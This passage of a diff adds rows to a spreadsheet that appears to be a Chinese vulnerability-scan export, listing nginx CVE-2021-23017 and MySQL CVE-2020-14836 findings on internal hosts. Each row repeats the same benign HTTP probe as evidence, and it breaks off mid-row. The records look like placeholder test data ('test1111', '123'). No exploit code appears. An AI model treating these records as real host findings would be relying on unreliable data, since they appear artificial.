+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
+        </is>
+      </c>
+      <c r="F36" t="inlineStr">
+        <is>
+          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
+        </is>
+      </c>
+      <c r="G36" t="inlineStr">
+        <is>
+          <t>有攻击代码披露</t>
+        </is>
+      </c>
+      <c r="H36" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I36" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J36" t="inlineStr">
+        <is>
+          <t>CVE-2021-23017</t>
+        </is>
+      </c>
+      <c r="K36" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:24</t>
+        </is>
+      </c>
+      <c r="L36" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:24</t>
+        </is>
+      </c>
+      <c r="M36" t="inlineStr">
+        <is>
+          <t>192.168.54.213</t>
+        </is>
+      </c>
+      <c r="N36" t="inlineStr">
+        <is>
+          <t>其他</t>
+        </is>
+      </c>
+      <c r="O36" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P36" t="inlineStr">
+        <is>
+          <t>test1111</t>
+        </is>
+      </c>
+      <c r="Q36" t="inlineStr"/>
+      <c r="R36" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S36" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T36" t="inlineStr">
+        <is>
+          <t>123</t>
+        </is>
+      </c>
+      <c r="U36" t="inlineStr"/>
+      <c r="V36" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W36" t="inlineStr">
+        <is>
+          <t xml:space="preserve">页面url: -
+请求体: GET /login.html HTTP/1.1
+Host: 129.195.085.043:443
+User-Agent: python-requests/2.23.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Range: bytes=0-99999\r\n\r\n
+响应体: HTTP/1.1 200 OK
+Server: 
+Date: Tue, 10 May 2022 11:52:26 GMT
+Content-Type: text/html
+Content-Length: 1796
+Last-Modified: Mon, 09 May 2022 18:02:01 GMT
+Connection: keep-alive
+ETag: "62795719-704"
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+X-Content-Type-Options: nosniff
+Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
+Content-Security-Policy: frame-ancestors: self
+Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
+</t>
+        </is>
+      </c>
+      <c r="X36" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y36" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="37">
+      <c r="A37" t="inlineStr">
+        <is>
+          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
+        </is>
+      </c>
+      <c r="B37" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C37" t="inlineStr">
+        <is>
+          <t>高危</t>
+        </is>
+      </c>
+      <c r="D37" t="inlineStr"/>
+      <c r="E37" t="inlineStr">
+        <is>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
+        </is>
+      </c>
+      <c r="F37" t="inlineStr">
+        <is>
+          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
+        </is>
+      </c>
+      <c r="G37" t="inlineStr">
+        <is>
+          <t>有攻击代码披露</t>
+        </is>
+      </c>
+      <c r="H37" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I37" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J37" t="inlineStr">
+        <is>
+          <t>CVE-2021-23017</t>
+        </is>
+      </c>
+      <c r="K37" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:24</t>
+        </is>
+      </c>
+      <c r="L37" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:24</t>
+        </is>
+      </c>
+      <c r="M37" t="inlineStr">
+        <is>
+          <t>192.168.54.174</t>
+        </is>
+      </c>
+      <c r="N37" t="inlineStr">
+        <is>
+          <t>服务器</t>
+        </is>
+      </c>
+      <c r="O37" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P37" t="inlineStr">
+        <is>
+          <t>test1111</t>
+        </is>
+      </c>
+      <c r="Q37" t="inlineStr"/>
+      <c r="R37" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S37" t="inlineStr">
+        <is>
+          <t>退库资产</t>
+        </is>
+      </c>
+      <c r="T37" t="inlineStr">
+        <is>
+          <t>123</t>
+        </is>
+      </c>
+      <c r="U37" t="inlineStr"/>
+      <c r="V37" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W37" t="inlineStr">
+        <is>
+          <t xml:space="preserve">页面url: -
+请求体: GET /login.html HTTP/1.1
+Host: 129.195.085.043:443
+User-Agent: python-requests/2.23.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Range: bytes=0-99999\r\n\r\n
+响应体: HTTP/1.1 200 OK
+Server: 
+Date: Tue, 10 May 2022 11:52:26 GMT
+Content-Type: text/html
+Content-Length: 1796
+Last-Modified: Mon, 09 May 2022 18:02:01 GMT
+Connection: keep-alive
+ETag: "62795719-704"
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+X-Content-Type-Options: nosniff
+Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
+Content-Security-Policy: frame-ancestors: self
+Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
+</t>
+        </is>
+      </c>
+      <c r="X37" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y37" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="38">
+      <c r="A38" t="inlineStr">
+        <is>
+          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
+        </is>
+      </c>
+      <c r="B38" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C38" t="inlineStr">
+        <is>
+          <t>高危</t>
+        </is>
+      </c>
+      <c r="D38" t="inlineStr"/>
+      <c r="E38" t="inlineStr">
+        <is>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
+        </is>
+      </c>
+      <c r="F38" t="inlineStr">
+        <is>
+          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
+        </is>
+      </c>
+      <c r="G38" t="inlineStr">
+        <is>
+          <t>有攻击代码披露</t>
+        </is>
+      </c>
+      <c r="H38" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I38" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J38" t="inlineStr">
+        <is>
+          <t>CVE-2021-23017</t>
+        </is>
+      </c>
+      <c r="K38" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:24</t>
+        </is>
+      </c>
+      <c r="L38" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:24</t>
+        </is>
+      </c>
+      <c r="M38" t="inlineStr">
+        <is>
+          <t>192.168.54.68</t>
+        </is>
+      </c>
+      <c r="N38" t="inlineStr">
+        <is>
+          <t>服务器</t>
+        </is>
+      </c>
+      <c r="O38" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P38" t="inlineStr">
+        <is>
+          <t>父组名</t>
+        </is>
+      </c>
+      <c r="Q38" t="inlineStr"/>
+      <c r="R38" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S38" t="inlineStr">
+        <is>
+          <t>退库资产</t>
+        </is>
+      </c>
+      <c r="T38" t="inlineStr">
+        <is>
+          <t>123</t>
+        </is>
+      </c>
+      <c r="U38" t="inlineStr"/>
+      <c r="V38" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W38" t="inlineStr">
+        <is>
+          <t xml:space="preserve">页面url: -
+请求体: GET /login.html HTTP/1.1
+Host: 129.195.085.043:443
+User-Agent: python-requests/2.23.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Range: bytes=0-99999\r\n\r\n
+响应体: HTTP/1.1 200 OK
+Server: 
+Date: Tue, 10 May 2022 11:52:26 GMT
+Content-Type: text/html
+Content-Length: 1796
+Last-Modified: Mon, 09 May 2022 18:02:01 GMT
+Connection: keep-alive
+ETag: "62795719-704"
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+X-Content-Type-Options: nosniff
+Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
+Content-Security-Policy: frame-ancestors: self
+Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
+</t>
+        </is>
+      </c>
+      <c r="X38" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y38" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="39">
+      <c r="A39" t="inlineStr">
+        <is>
+          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
+        </is>
+      </c>
+      <c r="B39" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C39" t="inlineStr">
+        <is>
+          <t>中危</t>
+        </is>
+      </c>
+      <c r="D39" t="inlineStr"/>
+      <c r="E39" t="inlineStr">
+        <is>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
+        </is>
+      </c>
+      <c r="F39" t="inlineStr">
+        <is>
+          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
+        </is>
+      </c>
+      <c r="G39" t="inlineStr">
+        <is>
+          <t>有攻击代码披露</t>
+        </is>
+      </c>
+      <c r="H39" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I39" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J39" t="inlineStr">
+        <is>
+          <t>CVE-2020-14836</t>
+        </is>
+      </c>
+      <c r="K39" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:24</t>
+        </is>
+      </c>
+      <c r="L39" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:24</t>
+        </is>
+      </c>
+      <c r="M39" t="inlineStr">
+        <is>
+          <t>192.168.51.66</t>
+        </is>
+      </c>
+      <c r="N39" t="inlineStr">
+        <is>
+          <t>服务器</t>
+        </is>
+      </c>
+      <c r="O39" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P39" t="inlineStr">
+        <is>
+          <t>子组名</t>
+        </is>
+      </c>
+      <c r="Q39" t="inlineStr"/>
+      <c r="R39" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S39" t="inlineStr">
+        <is>
+          <t>退库资产</t>
+        </is>
+      </c>
+      <c r="T39" t="inlineStr">
+        <is>
+          <t>123</t>
+        </is>
+      </c>
+      <c r="U39" t="inlineStr"/>
+      <c r="V39" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W39" t="inlineStr">
+        <is>
+          <t xml:space="preserve">页面url: -
+请求体: GET /login.html HTTP/1.1
+Host: 129.195.085.043:443
+User-Agent: python-requests/2.23.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Range: bytes=0-99999\r\n\r\n
+响应体: HTTP/1.1 200 OK
+Server: 
+Date: Tue, 10 May 2022 11:52:26 GMT
+Content-Type: text/html
+Content-Length: 1796
+Last-Modified: Mon, 09 May 2022 18:02:01 GMT
+Connection: keep-alive
+ETag: "62795719-704"
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+X-Content-Type-Options: nosniff
+Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
+Content-Security-Policy: frame-ancestors: self
+Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
+</t>
+        </is>
+      </c>
+      <c r="X39" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y39" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="40">
+      <c r="A40" t="inlineStr">
+        <is>
+          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
+        </is>
+      </c>
+      <c r="B40" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C40" t="inlineStr">
+        <is>
+          <t>中危</t>
+        </is>
+      </c>
+      <c r="D40" t="inlineStr"/>
+      <c r="E40" t="inlineStr">
+        <is>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
+        </is>
+      </c>
+      <c r="F40" t="inlineStr">
+        <is>
+          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
+        </is>
+      </c>
+      <c r="G40" t="inlineStr">
+        <is>
+          <t>有攻击代码披露</t>
+        </is>
+      </c>
+      <c r="H40" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I40" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J40" t="inlineStr">
+        <is>
+          <t>CVE-2020-14836</t>
+        </is>
+      </c>
+      <c r="K40" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:24</t>
+        </is>
+      </c>
+      <c r="L40" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:24</t>
+        </is>
+      </c>
+      <c r="M40" t="inlineStr">
+        <is>
+          <t>192.168.54.68</t>
+        </is>
+      </c>
+      <c r="N40" t="inlineStr">
+        <is>
+          <t>服务器</t>
+        </is>
+      </c>
+      <c r="O40" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P40" t="inlineStr">
+        <is>
+          <t>父组名</t>
+        </is>
+      </c>
+      <c r="Q40" t="inlineStr"/>
+      <c r="R40" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S40" t="inlineStr">
+        <is>
+          <t>退库资产</t>
+        </is>
+      </c>
+      <c r="T40" t="inlineStr">
+        <is>
+          <t>123</t>
+        </is>
+      </c>
+      <c r="U40" t="inlineStr"/>
+      <c r="V40" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W40" t="inlineStr">
+        <is>
+          <t xml:space="preserve">页面url: -
+请求体: GET /login.html HTTP/1.1
+Host: 129.195.085.043:443
+User-Agent: python-requests/2.23.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Range: bytes=0-99999\r\n\r\n
+响应体: HTTP/1.1 200 OK
+Server: 
+Date: Tue, 10 May 2022 11:52:26 GMT
+Content-Type: text/html
+Content-Length: 1796
+Last-Modified: Mon, 09 May 2022 18:02:01 GMT
+Connection: keep-alive
+ETag: "62795719-704"
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+X-Content-Type-Options: nosniff
+Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
+Content-Security-Policy: frame-ancestors: self
+Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" 